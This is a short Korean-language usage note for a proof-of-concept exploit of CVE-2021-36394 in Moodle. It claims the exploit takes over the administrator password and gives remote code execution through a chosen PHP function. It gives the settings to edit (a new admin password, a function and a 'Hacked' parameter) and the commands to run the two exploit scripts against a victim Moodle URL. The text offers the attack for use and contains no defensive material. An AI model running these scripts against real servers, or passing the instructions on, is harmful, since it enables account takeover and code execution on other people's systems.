
CVE-2021-36394에 대한 개념 증명 익스플로잇으로, Moodle에서 관리자 비밀번호 탈취 및 사용자 정의 PHP 함수를 통한 원격 코드 실행을 가능하게 합니다.
사용자 지정 코드
$newpassword = "Accounttakedover123";
그런 다음 실행:
$ CVE2021-36394.php http://victim/path_to_moodle
사용자 지정 코드
$function = "header"; $param = "Hacked: by0d0ff9";
그런 다음 실행:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle